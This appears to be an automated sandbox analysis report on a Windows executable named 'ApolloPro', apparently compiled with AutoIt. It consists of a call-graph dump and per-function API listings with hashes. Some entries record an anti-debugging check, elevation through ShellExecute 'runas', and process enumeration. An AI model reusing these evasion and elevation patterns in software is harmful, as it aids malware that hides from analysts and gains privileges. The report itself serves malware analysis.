__gmtime64_s 58 API calls 99689->99693 99731 6610b8 99690->99731 99692 661105 99691->99692 99701 66111c 99691->99701 99694 658d24 __close 58 API calls 99692->99694 99695 661111 99693->99695 99696 66110a 99694->99696 99697 658fe6 __gmtime64_s 9 API calls 99695->99697 99699 658d58 __gmtime64_s 58 API calls 99696->99699 99697->99731 99698 661131 99700 658d24 __close 58 API calls 99698->99700 99699->99695 99700->99696 99701->99698 99702 66114b 99701->99702 99703 661169 99701->99703 99701->99731 99702->99698 99705 661156 99702->99705 99704 658a4d __malloc_crt 58 API calls 99703->99704 99706 661179 99704->99706 99707 665e9b __read_nolock 58 API calls 99705->99707 99708 661181 99706->99708 99709 66119c 99706->99709 99710 66126a 99707->99710 99711 658d58 __gmtime64_s 58 API calls 99708->99711 99713 661af1 __lseeki64_nolock 60 API calls 99709->99713 99712 6612e3 ReadFile 99710->99712 99717 661280 GetConsoleMode 99710->99717 99714 661186 99711->99714 99715 661305 99712->99715 99716 6617c3 GetLastError 99712->99716 99713->99705 99718 658d24 __close 58 API calls 99714->99718 99715->99716 99723 6612d5 99715->99723 99719 6612c3 99716->99719 99720 6617d0 99716->99720 99721 661294 99717->99721 99722 6612e0 99717->99722 99718->99731 99727 658d37 __dosmaperr 58 API calls 99719->99727 99732 6612c9 99719->99732 99724 658d58 __gmtime64_s 58 API calls 99720->99724 99721->99722 99725 66129a ReadConsoleW 99721->99725 99722->99712 99723->99732 99733 66133a 99723->99733 99734 6615a7 99723->99734 99728 6617d5 99724->99728 99725->99723 99726 6612bd GetLastError 99725->99726 99726->99719 99727->99732 99729 658d24 __close 58 API calls 99728->99729 99729->99732 99730 652f85 _free 58 API calls 99730->99731 99731->99676 99732->99730 99732->99731 99736 6613a6 ReadFile 99733->99736 99742 661427 99733->99742 99734->99732 99737 6616ad ReadFile 99734->99737 99738 6613c7 GetLastError 99736->99738 99746 6613d1 99736->99746 99741 6616d0 GetLastError 99737->99741 99749 6616de 99737->99749 99738->99746 99739 6614e4 99744 661494 MultiByteToWideChar 99739->99744 99745 661af1 __lseeki64_nolock 60 API calls 99739->99745 99740 6614d4 99743 658d58 __gmtime64_s 58 API calls 99740->99743 99741->99749 99742->99732 99742->99739 99742->99740 99742->99744 99743->99732 99744->99726 99744->99732 99745->99744 99746->99733 99747 661af1 __lseeki64_nolock 60 API calls 99746->99747 99747->99746 99748 661af1 __lseeki64_nolock 60 API calls 99748->99749 99749->99734 99749->99748 99751 660de2 99750->99751 99754 660df7 99750->99754 99752 658d58 __gmtime64_s 58 API calls 99751->99752 99753 660de7 99752->99753 99755 658fe6 __gmtime64_s 9 API calls 99753->99755 99756 660e2c 99754->99756 99757 666214 __getbuf 58 API calls 99754->99757 99763 660df2 99754->99763 99755->99763 99758 654906 __output_l 58 API calls 99756->99758 99757->99756 99759 660e40 99758->99759 99760 660f77 __read 72 API calls 99759->99760 99761 660e47 99760->99761 99762 654906 __output_l 58 API calls 99761->99762 99761->99763 99764 660e6a 99762->99764 99763->99676 99764->99763 99765 654906 __output_l 58 API calls 99764->99765 99766 660e76 99765->99766 99766->99763 99767 654906 __output_l 58 API calls 99766->99767 99768 660e83 99767->99768 99769 654906 __output_l 58 API calls 99768->99769 99769->99763 99770->99669 99771->99672 99772->99676 99773->99669 99777 65542a GetSystemTimeAsFileTime 99774->99777 99776 699529 99776->99442 99778 655458 __aulldiv 99777->99778 99778->99776 99780 655e8c __fcloseall 99779->99780 99781 655eb3 99780->99781 99782 655e9e 99780->99782 99784 656e3e __lock_file 59 API calls 99781->99784 99792 658d58 58 API calls __getptd_noexit 99782->99792 99786 655eb9 99784->99786 99785 655ea3 99793 658fe6 9 API calls __gmtime64_s 99785->99793 99788 655af0 __ftell_nolock 67 API calls 99786->99788 99789 655ec4 99788->99789 99794 655ee4 LeaveCriticalSection LeaveCriticalSection _fseek 99789->99794 99791 655eae __fcloseall 99791->99447 99792->99785 99793->99791 99794->99791 99796 6442cf CloseHandle 99795->99796 99797 643e2d Mailbox 99796->99797 99798 6442cf CloseHandle 99797->99798 99799 643e3c 99798->99799 99799->99291 99800->99245 99801->99247 99802->99255 99803->99276 99804->99254 99805->99274 99806->99283 99807->99321 99808->99321 99809->99321 99810->99321 99811->99321 99812->99321 99813->99321 99815 6442e8 99814->99815 99816 6442d9 99814->99816 99815->99816 99817 6442ed CloseHandle 99815->99817 99816->99300 99817->99816 99818->99244 99819->99251 99820->99279 99821->99329 99822->99329 99823->99306 99824->99328 99825->99307 99826->99312 99828 699d05 __tzset_nolock _wcscmp 99827->99828 99829 644ab2 74 API calls 99828->99829 99830 699b99 99828->99830 99831 6996c4 GetSystemTimeAsFileTime 99828->99831 99832 644a8c 85 API calls 99828->99832 99829->99828 99830->99337 99830->99365 99831->99828 99832->99828 99834 6990da 99833->99834 99835 6990cc 99833->99835 99837 69911f 99834->99837 99838 65547b 115 API calls 99834->99838 99863 6990e3 99834->99863 99836 65547b 115 API calls 99835->99836 99836->99834 99864 69934c 74 API calls 3 library calls 99837->99864 99839 699104 99838->99839 99839->99837 99842 69910d 99839->99842 99841 699163 99843 699188 99841->99843 99844 699167 99841->99844 99842->99863 99874 6555c6 99842->99874 99865 698f64 99843->99865 99847 699174 99844->99847 99848 6555c6 __fcloseall 83 API calls 99844->99848 99850 6555c6 __fcloseall 83 API calls 99847->99850 99847->99863 99848->99847 99850->99863 99863->99366 99864->99841 99866 65593c __crtGetStringTypeA_stat 58 API calls 99865->99866 99867 698f73 99866->99867 99868 65593c __crtGetStringTypeA_stat 58 API calls 99867->99868 99869 698f87 99868->99869 99870 65593c __crtGetStringTypeA_stat 58 API calls 99869->99870 99875 6555d2 __fcloseall 99874->99875 99876 6555e6 99875->99876 99877 6555fe 99875->99877 99912 658d58 58 API calls __getptd_noexit 99876->99912 99880 656e3e __lock_file 59 API calls 99877->99880 99883 6555f6 __fcloseall 99877->99883 99879 6555eb 99913 658fe6 9 API calls __gmtime64_s 99879->99913 99882 655610 99880->99882 99896 65555a 99882->99896 99883->99863 99897 65557d 99896->99897 99898 655569 99896->99898 99900 655579 99897->99900 99902 654c5d __flush 78 API calls 99897->99902 99912->99879 99913->99883 99980 642cc7 99979->99980 99981 642ddb 99979->99981 99980->99981 99982 650fe6 Mailbox 59 API calls 99980->99982 99981->99027 99984 642cee 99982->99984 99983 650fe6 Mailbox 59 API calls 99989 642d63 99983->99989 99984->99983 99987 643297 59 API calls 99987->99989 99988 64343f 59 API calls 99988->99989 99989->99981 99989->99987 99989->99988 99992 6420e0 94 API calls 2 library calls 99989->99992 99993 68715b 59 API calls Mailbox 99989->99993 99990->99029 99991->99031 99992->99989 99993->99989 100043 653465 __fcloseall 100042->100043 100044 659e3b __lock 51 API calls 100043->100044 100045 65346c 100044->100045 100046 65349a DecodePointer 100045->100046 100048 653525 __cinit 100045->100048 100046->100048 100049 6534b1 DecodePointer 100046->100049 100062 653573 100048->100062 100056 6534c1 100049->100056 100051 653582 __fcloseall 100051->98808 100053 6534ce EncodePointer 100053->100056 100054 65356a 100055 6532cf __mtinitlocknum 3 API calls 100054->100055 100057 653573 100055->100057 100056->100048 100056->100053 100058 6534de DecodePointer EncodePointer 100056->100058 100059 653580 100057->100059 100067 659fa5 LeaveCriticalSection 100057->100067 100060 6534f0 DecodePointer DecodePointer 100058->100060 100059->98808 100060->100056 100063 653579 100062->100063 100065 653553 100062->100065 100068 659fa5 LeaveCriticalSection 100063->100068 100065->100051 100066 659fa5 LeaveCriticalSection 100065->100066 100066->100054 100067->100059 100068->100065 100069 644d83 100070 644dba 100069->100070 100071 644e35 100070->100071 100072 644e37 100070->100072 100073 644dd8 100070->100073 100076 644e1a DefWindowProcW 100071->100076 100077 644e3d 100072->100077 100078 6809c2 100072->100078 100074 644de5 100073->100074 100075 644ead PostQuitMessage 100073->100075 100079 644df0 100074->100079 100080 680a35 100074->100080 100082 644e28 100075->100082 100076->100082 100083 644e65 SetTimer RegisterWindowMessageW 100077->100083 100084 644e42 100077->100084 100081 63c460 10 API calls 100078->100081 100085 644eb7 100079->100085 100086 644df8 100079->100086 100124 692cce 97 API calls _memset 100080->100124 100089 6809e9 100081->100089 100083->100082 100087 644e8e CreatePopupMenu 100083->100087 100090 680965 100084->100090 100091 644e49 KillTimer 100084->100091 100114 645b29 100085->100114 100092 680a1a 100086->100092 100093 644e03 100086->100093 100087->100082 100095 63c483 266 API calls 100089->100095 100097 68096a 100090->100097 100098 68099e MoveWindow 100090->100098 100099 645ac3 Shell_NotifyIconW 100091->100099 100092->100076 100123 688854 59 API calls Mailbox 100092->100123 100100 644e0e 100093->100100 100101 644e9b 100093->100101 100094 680a47 100094->100076 100094->100082 100095->100100 100102 68098d SetFocus 100097->100102 100103 68096e 100097->100103 100098->100082 100104 644e5c 100099->100104 100100->100076 100111 645ac3 Shell_NotifyIconW 100100->100111 100122 645bd7 107 API calls _memset 100101->100122 100102->100082 100103->100100 100107 680977 100103->100107 100121 6334e4 DeleteObject DestroyWindow Mailbox 100104->100121 100110 63c460 10 API calls 100107->100110 100109 644eab 100109->100082 100110->100082 100112 680a0e 100111->100112 100113 6459d3 94 API calls 100112->100113 100113->100071 100115 645b40 _memset 100114->100115 100116 645bc2 100114->100116 100117 6456f8 87 API calls 100115->100117 100116->100082 100119 645b67 100117->100119 100118 645bab KillTimer SetTimer 100118->100116 100119->100118 100120 680d6e Shell_NotifyIconW 100119->100120 100120->100118 100121->100082 100122->100109 100123->100071 100124->100094 100125 639a88 100128 6386e0 100125->100128 100129 6386fd 100128->100129 100130 670fad 100129->100130 100131 670ff8 100129->100131 100156 638724 100129->100156 100134 670fb5 100130->100134 100138 670fc2 100130->100138 100130->100156 100168 6aaad0 266 API calls __cinit 100131->100168 100166 6ab0e4 266 API calls 100134->100166 100135 652f70 __cinit 67 API calls 100135->100156 100152 63898d 100138->100152 100167 6ab58c 266 API calls 3 library calls 100138->100167 100139 671289 100139->100139 100140 633c30 68 API calls 100140->100156 100142 6711af 100171 6aae3b 89 API calls 100142->100171 100145 638a17 100146 6339be 68 API calls 100146->100156 100151 633f42 68 API calls 100151->100156 100152->100145 100172 69a48d 89 API calls 4 library calls 100152->100172 100153 6353b0 266 API calls 100153->100156 100154 641c9c 59 API calls 100154->100156 100156->100135 100156->100140 100156->100142 100156->100145 100156->100146 100156->100151 100156->100152 100156->100153 100156->100154 100157 633938 68 API calls 100156->100157 100158 63855e 266 API calls 100156->100158 100159 635278 100156->100159 100164 6384e2 89 API calls 100156->100164 100165 63835f 266 API calls 100156->100165 100169 63523c 59 API calls 100156->100169 100170 6873ab 59 API calls 100156->100170 100157->100156 100158->100156 100160 650fe6 Mailbox 59 API calls 100159->100160 100161 635285 100160->100161 100162 635294 100161->100162 100163 641a36 59 API calls 100161->100163 100162->100156 100163->100162 100164->100156 100165->100156 100166->100138 100167->100152 100168->100156 100169->100156 100170->100156 100171->100152 100172->100139 100173 66b7ad 100176 63ad98 100173->100176 100177 672f63 DestroyWindow 100176->100177 100178 63add7 mciSendStringW 100176->100178 100189 672f6f 100177->100189 100179 63adf3 100178->100179 100180 63afc0 100178->100180 100182 63ae01 100179->100182 100179->100189 100180->100179 100181 63afcf UnregisterHotKey 100180->100181 100181->100180 100212 63c71f 100182->100212 100184 672fb4 100190 672fc7 FreeLibrary 100184->100190 100191 672fd8 100184->100191 100186 672f8d FindClose 100186->100189 100187 6442cf CloseHandle 100187->100189 100188 63ae16 100188->100191 100198 63ae24 100188->100198 100189->100184 100189->100186 100189->100187 100190->100184 100192 672fec VirtualFree 100191->100192 100193 67301a 100191->100193 100192->100191 100195 63ae91 100193->100195 100216 697079 100193->100216 100194 63ae80 CoUninitialize 100194->100193 100194->100195 100196 673033 100195->100196 100197 63ae9c 100195->100197 100201 673042 100196->100201 100223 69a240 CloseHandle 100196->100223 100199 63aeac Mailbox 100197->100199 100198->100194 100221 64fef1 61 API calls Mailbox 100199->100221 100207 673056 100201->100207 100224 68d5cb 59 API calls Mailbox 100201->100224 100203 63aec2 Mailbox 100222 65052f 59 API calls Mailbox 100203->100222 100213 63c72e Mailbox 100212->100213 100214 63ae08 100213->100214 100225 68e0aa 59 API calls 100213->100225 100214->100184 100214->100188 100226 6977eb 100216->100226 100219 65105c 100220 6970a1 DeleteCriticalSection 100219->100220 100220->100195 100221->100203 100223->100196 100224->100201 100225->100213 100227 697087 CloseHandle CloseHandle 100226->100227 100228 6977f7 InterlockedExchange 100226->100228 100227->100219 100228->100227 100229 69780b EnterCriticalSection TerminateThread WaitForSingleObject 100228->100229 100232 6971f0 CloseHandle 100229->100232 100231 697836 InterlockedExchange LeaveCriticalSection 100231->100227 100232->100231 100233 639a6c 100236 63829c 100233->100236 100235 639a78 100237 6382b4 100236->100237 100244 638308 100236->100244 100238 6353b0 266 API calls 100237->100238 100237->100244 100242 6382eb 100238->100242 100240 670ed8 100240->100240 100241 638331 100241->100235 100242->100241 100245 63523c 59 API calls 100242->100245 100244->100241 100246 69a48d 89 API calls 4 library calls 100244->100246 100245->100244 100246->100240 100247 631016 100252 645ce7 100247->100252 100250 652f70 __cinit 67 API calls 100251 631025 100250->100251 100253 650fe6 Mailbox 59 API calls 100252->100253 100254 645cef 100253->100254 100255 63101b 100254->100255 100259 645f39 100254->100259 100255->100250 100260 645cfb 100259->100260 100261 645f42 100259->100261 100263 645d13 100260->100263 100262 652f70 __cinit 67 API calls 100261->100262 100262->100260 100264 641207 59 API calls 100263->100264 100265 645d2b GetVersionExW 100264->100265 100266 641821 59 API calls 100265->100266 100267 645d6e 100266->100267 100268 641981 59 API calls 100267->100268 100273 645d9b 100267->100273 100269 645d8f 100268->100269 100270 64133d 59 API calls 100269->100270 100270->100273 100271 645e00 GetCurrentProcess IsWow64Process 100272 645e19 100271->100272 100275 645e2f 100272->100275 100276 645e98 GetSystemInfo 100272->100276 100273->100271 100274 681098 100273->100274 100287 6455f0 100275->100287 100277 645e65 100276->100277 100277->100255 100280 645e41 100283 6455f0 2 API calls 100280->100283 100281 645e8c GetSystemInfo 100282 645e56 100281->100282 100282->100277 100284 645e5c FreeLibrary 100282->100284 100285 645e49 GetNativeSystemInfo 100283->100285 100284->100277 100285->100282 100288 645619 100287->100288 100289 6455f9 LoadLibraryA 100287->100289 100288->100280 100288->100281 100289->100288 100290 64560a GetProcAddress 100289->100290 100290->100288 100291 631055 100296 632a19 100291->100296 100294 652f70 __cinit 67 API calls 100295 631064 100294->100295 100297 641207 59 API calls 100296->100297 100298 632a87 100297->100298 100303 631256 100298->100303 100301 632b24 100302 63105a 100301->100302 100306 6313f8 59 API calls 2 library calls 100301->100306 100302->100294 100307 631284 100303->100307 100306->100301 100308 631275 100307->100308 100309 631291 100307->100309 100308->100301 100309->100308 100310 631298 RegOpenKeyExW 100309->100310 100310->100308 100311 6312b2 RegQueryValueExW 100310->100311 100312 6312d3 100311->100312 100313 6312e8 RegCloseKey 100311->100313 100312->100313 100313->100308 100314 635ff5 100337 635ede Mailbox _memmove 100314->100337 100315 650fe6 59 API calls Mailbox 100315->100337 100316 636a9b 100402 63a9de 266 API calls 100316->100402 100317 6353b0 266 API calls 100317->100337 100319 66eff9 100414 635190 59 API calls Mailbox 100319->100414 100321 66f007 100415 69a48d 89 API calls 4 library calls 100321->100415 100323 66efeb 100351 635569 Mailbox 100323->100351 100413 686cf1 59 API calls Mailbox 100323->100413 100326 6360e5 100327 66e137 100326->100327 100333 6363bd Mailbox 100326->100333 100340 636abc 100326->100340 100359 636152 Mailbox 100326->100359 100327->100333 100403 687aad 59 API calls 100327->100403 100328 641c9c 59 API calls 100328->100337 100331 650fe6 Mailbox 59 API calls 100336 6363d1 100331->100336 100332 641a36 59 API calls 100332->100337 100333->100331 100343 636426 100333->100343 100335 6ac355 266 API calls 100335->100337 100338 6363de 100336->100338 100336->100340 100337->100315 100337->100316 100337->100317 100337->100319 100337->100321 100337->100326 100337->100328 100337->100332 100337->100335 100337->100340 100337->100351 100401 63523c 59 API calls 100337->100401 100406 697f11 59 API calls Mailbox 100337->100406 100407 686cf1 59 API calls Mailbox 100337->100407 100341 636413 100338->100341 100342 66e172 100338->100342 100412 69a48d 89 API calls 4 library calls 100340->100412 100341->100343 100369 635447 Mailbox 100341->100369 100404 6ac87c 85 API calls 2 library calls 100342->100404 100405 6ac9c9 95 API calls Mailbox 100343->100405 100347 66e19d 100347->100347 100348 66f165 100417 69a48d 89 API calls 4 library calls 100348->100417 100349 66e691 100409 69a48d 89 API calls 4 library calls 100349->100409 100354 6369fa 100363 641c9c 59 API calls 100354->100363 100356 641c9c 59 API calls 100356->100369 100357 66e6a0 100358 650fe6 59 API calls Mailbox 100358->100369 100359->100323 100359->100340 100359->100351 100364 66e2e9 VariantClear 100359->100364 100377 6ae60c 130 API calls 100359->100377 100378 6af1b2 91 API calls 100359->100378 100379 63cfd7 100359->100379 100400 635190 59 API calls Mailbox 100359->100400 100408 687aad 59 API calls 100359->100408 100360 66ea9a 100366 641c9c 59 API calls 100360->100366 100361 6369ff 100361->100348 100361->100349 100363->100351 100364->100359 100366->100351 100367 687aad 59 API calls 100367->100369 100368 641207 59 API calls 100368->100369 100369->100349 100369->100351 100369->100354 100369->100356 100369->100358 100369->100360 100369->100361 100369->100367 100369->100368 100370 66eb67 100369->100370 100372 652f70 67 API calls __cinit 100369->100372 100373 66ef28 100369->100373 100375 635a1a 100369->100375 100398 637e50 266 API calls 2 library calls 100369->100398 100399 636e30 60 API calls Mailbox 100369->100399 100370->100351 100410 687aad 59 API calls 100370->100410 100372->100369 100411 69a48d 89 API calls 4 library calls 100373->100411 100416 69a48d 89 API calls 4 library calls 100375->100416 100377->100359 100378->100359 100380 634d37 84 API calls 100379->100380 100381 63d001 100380->100381 100382 635278 59 API calls 100381->100382 100383 63d018 100382->100383 100384 63d57b 100383->100384 100390 63d439 Mailbox __NMSG_WRITE 100383->100390 100418 63502b 59 API calls 100383->100418 100384->100359 100386 65312d _W_store_winword 60 API calls 100386->100390 100387 64162d 59 API calls 100387->100390 100388 634f98 59 API calls 100388->100390 100389 650c65 62 API calls 100389->100390 100390->100384 100390->100386 100390->100387 100390->100388 100390->100389 100393 63502b 59 API calls 100390->100393 100394 634d37 84 API calls 100390->100394 100395 641821 59 API calls 100390->100395 100396 6459d3 94 API calls 100390->100396 100397 645ac3 Shell_NotifyIconW 100390->100397 100419 64153b 59 API calls 2 library calls 100390->100419 100420 634f3c 59 API calls Mailbox 100390->100420 100393->100390 100394->100390 100395->100390 100396->100390 100397->100390 100398->100369 100399->100369 100400->100359 100401->100337 100402->100340 100403->100333 100404->100343 100405->100347 100406->100337 100407->100337 100408->100359 100409->100357 100410->100351 100411->100375 100412->100323 100413->100351 100414->100323 100415->100323 100416->100351 100417->100351 100418->100390 100419->100390 100420->100390 100421 63107d 100426 642fc5 100421->100426 100423 63108c 100424 652f70 __cinit 67 API calls 100423->100424 100425 631096 100424->100425 100427 642fd5 __write_nolock 100426->100427 100428 641207 59 API calls 100427->100428 100429 64308b 100428->100429 100430 6500cf 61 API calls 100429->100430 100431 643094 100430->100431 100457 6508c1 100431->100457 100434 641900 59 API calls 100435 6430ad 100434->100435 100436 644c94 59 API calls 100435->100436 100437 6430bc 100436->100437 100438 641207 59 API calls 100437->100438 100439 6430c5 100438->100439 100440 6419e1 59 API calls 100439->100440 100441 6430ce RegOpenKeyExW 100440->100441 100442 6801a3 RegQueryValueExW 100441->100442 100445 6430f0 Mailbox 100441->100445 100443 6801c0 100442->100443 100444 680235 RegCloseKey 100442->100444 100446 650fe6 Mailbox 59 API calls 100443->100446 100444->100445 100456 680247 _wcscat Mailbox __NMSG_WRITE 100444->100456 100445->100423 100447 6801d9 100446->100447 100449 64433f 59 API calls 100447->100449 100448 641609 59 API calls 100448->100456 100450 6801e4 RegQueryValueExW 100449->100450 100451 680201 100450->100451 100453 68021b 100450->100453 100452 641821 59 API calls 100451->100452 100452->100453 100453->100444 100454 641a36 59 API calls 100454->100456 100455 644c94 59 API calls 100455->100456 100456->100445 100456->100448 100456->100454 100456->100455 100458 661b70 __write_nolock 100457->100458 100459 6508ce GetFullPathNameW 100458->100459 100460 6508f0 100459->100460 100461 641821 59 API calls 100460->100461 100462 64309f 100461->100462 100462->100434 100463 6701f8 100464 6701fa 100463->100464 100467 694d18 SHGetFolderPathW 100464->100467 100468 641821 59 API calls 100467->100468 100469 670203 100468->100469

                                                                                              Executed Functions

                                                                                              Function 00645240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0064526C
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0064527E
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006452E6
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                                • Part of subcall function 0063BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0063BC07
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00645366
                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00680B2E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00680B66
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006E6D10), ref: 00680BE9
                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00680BF0
                                                                                                • Part of subcall function 0064514C: GetSysColorBrush.USER32(0000000F), ref: 00645156
                                                                                                • Part of subcall function 0064514C: LoadCursorW.USER32(00000000,00007F00), ref: 00645165
                                                                                                • Part of subcall function 0064514C: LoadIconW.USER32(00000063), ref: 0064517C
                                                                                                • Part of subcall function 0064514C: LoadIconW.USER32(000000A4), ref: 0064518E
                                                                                                • Part of subcall function 0064514C: LoadIconW.USER32(000000A2), ref: 006451A0
                                                                                                • Part of subcall function 0064514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006451C6
                                                                                                • Part of subcall function 0064514C: RegisterClassExW.USER32(?), ref: 0064521C
                                                                                                • Part of subcall function 006450DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00645109
                                                                                                • Part of subcall function 006450DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0064512A
                                                                                                • Part of subcall function 006450DB: ShowWindow.USER32(00000000), ref: 0064513E
                                                                                                • Part of subcall function 006450DB: ShowWindow.USER32(00000000), ref: 00645147
                                                                                                • Part of subcall function 006459D3: _memset.LIBCMT ref: 006459F9
                                                                                                • Part of subcall function 006459D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00645A9E
                                                                                              Strings
                                                                                              • runas, xrefs: 00680BE4
                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00680B28
                                                                                              • AutoIt, xrefs: 00680B23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                              • API String ID: 529118366-2030392706
                                                                                              • Opcode ID: 481430e28d174019061d248353c14dd58efce24f08c6786dbe1e2a0ddca4a0ca
                                                                                              • Instruction ID: d2b0019a4c3a26b17e84af7ba38e2ba2d823ffeaf2f6fd60252d048e425615fb
                                                                                              • Opcode Fuzzy Hash: 481430e28d174019061d248353c14dd58efce24f08c6786dbe1e2a0ddca4a0ca
                                                                                              • Instruction Fuzzy Hash: 8551063090824CEFDF51AFB0DC46DFE7B7BAF06340F101169F552A6262DAB55649CB24
                                                                                              Function 00645D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1171 645d13-645d73 call 641207 GetVersionExW call 641821 1176 645e78-645e7a 1171->1176 1177 645d79 1171->1177 1178 680fa9-680fb5 1176->1178 1179 645d7c-645d81 1177->1179 1180 680fb6-680fba 1178->1180 1181 645d87 1179->1181 1182 645e7f-645e80 1179->1182 1184 680fbc 1180->1184 1185 680fbd-680fc9 1180->1185 1183 645d88-645dbf call 641981 call 64133d 1181->1183 1182->1183 1193 681098-68109b 1183->1193 1194 645dc5-645dc6 1183->1194 1184->1185 1185->1180 1186 680fcb-680fd0 1185->1186 1186->1179 1188 680fd6-680fdd 1186->1188 1188->1178 1190 680fdf 1188->1190 1195 680fe4-680fea 1190->1195 1197 68109d 1193->1197 1198 6810b4-6810b8 1193->1198 1199 680fef-680ffa 1194->1199 1200 645dcc-645dcf 1194->1200 1196 645e00-645e17 GetCurrentProcess IsWow64Process 1195->1196 1205 645e1c-645e2d 1196->1205 1206 645e19 1196->1206 1203 6810a0 1197->1203 1207 6810ba-6810c3 1198->1207 1208 6810a3-6810ac 1198->1208 1201 680ffc-681002 1199->1201 1202 681017-681019 1199->1202 1200->1196 1204 645dd1-645def 1200->1204 1209 68100c-681012 1201->1209 1210 681004-681007 1201->1210 1212 68101b-681027 1202->1212 1213 68103c-68103f 1202->1213 1203->1208 1204->1196 1211 645df1-645df7 1204->1211 1215 645e2f-645e3f call 6455f0 1205->1215 1216 645e98-645ea2 GetSystemInfo 1205->1216 1206->1205 1207->1203 1214 6810c5-6810c8 1207->1214 1208->1198 1209->1196 1210->1196 1211->1195 1217 645dfd 1211->1217 1218 681029-68102c 1212->1218 1219 681031-681037 1212->1219 1221 681041-681050 1213->1221 1222 681065-681068 1213->1222 1214->1208 1228 645e41-645e4e call 6455f0 1215->1228 1229 645e8c-645e96 GetSystemInfo 1215->1229 1220 645e65-645e75 1216->1220 1217->1196 1218->1196 1219->1196 1224 68105a-681060 1221->1224 1225 681052-681055 1221->1225 1222->1196 1227 68106e-681083 1222->1227 1224->1196 1225->1196 1230 68108d-681093 1227->1230 1231 681085-681088 1227->1231 1236 645e85-645e8a 1228->1236 1237 645e50-645e54 GetNativeSystemInfo 1228->1237 1232 645e56-645e5a 1229->1232 1230->1196 1231->1196 1232->1220 1234 645e5c-645e5f FreeLibrary 1232->1234 1234->1220 1236->1237 1237->1232
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00645D40
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • GetCurrentProcess.KERNEL32(?,006C0A18,00000000,00000000,?), ref: 00645E07
                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00645E0E
                                                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00645E54
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00645E5F
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00645E90
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00645E9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1986165174-0
                                                                                              • Opcode ID: 357dc518f7d9839755a189b845f06731bf462f08e88a38c5d8517fda967cff8a
                                                                                              • Instruction ID: 32abdd71690ba8616f1022f8bfcae7feaf20c8659ee0d7014b47e06902150ed1
                                                                                              • Opcode Fuzzy Hash: 357dc518f7d9839755a189b845f06731bf462f08e88a38c5d8517fda967cff8a
                                                                                              • Instruction Fuzzy Hash: B191C331549BC4DFD731DB7884505EAFFE66F2A300B884A9ED0C797B02D630A649C75A
                                                                                              Function 00694148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0069416D
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0069417B
